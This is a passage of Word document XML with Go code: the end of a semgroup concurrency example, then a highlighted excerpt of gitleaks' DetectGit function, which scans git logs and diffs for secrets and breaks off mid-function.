        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA531BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571F71A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7021794F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F37B5DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Wait for all visits to complete. Any errors are accumulated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274914B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err := s.Wait(); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB7443" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0197FD65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE0B102" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF35EBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8642C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// 3 error(s) occurred:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBC2554" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// * only one visitor is allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F0F655" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// * only one visitor is allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F270D84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// * only one visitor is allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E7DB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3069733A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5876562E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED501F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB87595" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>“github.com/fatih/semgroup”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B83B8B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (d *Detector) DetectGit(source string, logOpts string, gitScanType GitScanType) ([]report.Finding, error) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>var (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>gitdiffFiles &lt;-chan *gitdiff.File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>err          error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>switch gitScanType {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>case DetectType:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>gitdiffFiles, err = git.GitLog(source, logOpts)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return d.findings, err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>case ProtectType:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>gitdiffFiles, err = git.GitDiff(source, false)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return d.findings, err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>case ProtectStagedType:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>gitdiffFiles, err = git.GitDiff(source, true)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return d.findings, err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>s := semgroup.NewGroup(context.Background(), 1000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for gitdiffFile := range gitdiffFiles {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>gitdiffFile := gitdiffFile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// skip binary files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if gitdiffFile.IsBinary || gitdiffFile.IsDelete {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Check if commit is allowed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>commitSHA := ""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if gitdiffFile.PatchHeader != nil {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>commitSHA = gitdiffFile.PatchHeader.SHA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if d.Config.Allowlist.CommitAllowed(gitdiffFile.PatchHeader.SHA) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>d.addCommit(commitSHA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">s.Go(func() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>error {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, textFragment := range gitdiffFile.TextFragments {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if textFragment == nil || len(textFragment.Lines) &gt; 12000 {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fragment := Fragment{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Raw:       textFragment.Raw(gitdiff.OpAdd),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>CommitSHA: commitSHA,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
